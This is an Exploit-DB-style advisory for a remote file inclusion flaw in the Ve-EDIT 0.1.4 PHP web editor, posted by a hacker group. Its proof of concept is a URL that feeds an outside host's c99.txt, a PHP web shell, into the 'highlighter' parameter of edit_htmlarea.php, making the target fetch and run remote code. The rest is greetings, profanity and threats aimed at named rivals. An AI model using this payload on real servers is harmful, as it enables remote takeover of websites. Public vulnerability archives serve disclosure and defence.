Ve-EDIT 0.1.4 - 'highlighter' Remote File Inclusion

EDB-ID:

9577




Platform:

PHP

Date:

2009-09-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

   ====================================================
   | Ve-EDIT v 0.1.4 Remote File Include Vulne 
   |     My Home Page : WwW.Sec-Code.CoM
   |        Founded By RoMaNcYxHaCkEr           
   ====================================================
 
[!] Discovered.:                        RoMaNcYxHaCkEr
[!] Vendor.....:                          http://sourceforge.net/projects/phpwebeditor/
[!] My Homepage...:                 WwW.Sec-Code.CoM
[!] Security - Codes Group ...:  mr-al7rbi , sniper-code
[!] Contact Me ...:                     rXh@Mail.Net.Sa
 
[!] PoC........:
 
http://WwW.Sec-Code.CoM/vedit/editor/edit_htmlarea.php?highlighter=http://WwW.Sec-Code.CoM/c99.txt?
 
[!] Solution...:     Contact With Me ;)
 
[!] Greetingz..:    All My Forum Members , My TeaM , أبو عذاب , Dexter Franklin ;)
 
[!] Thx .. :            CoBRa_21 For His Found
 
[!] Fuck To .. :      Third , Dev1l-Fucker , sarbot511 <<< They Big Big Big Big Lamerz
 
[!] Note :             Watch Out Your Back , Before I Kick Your Ass Asshole :)
 
[!] rXh
 
[!] bEST wISHES

# milw0rm.com [2009-09-02]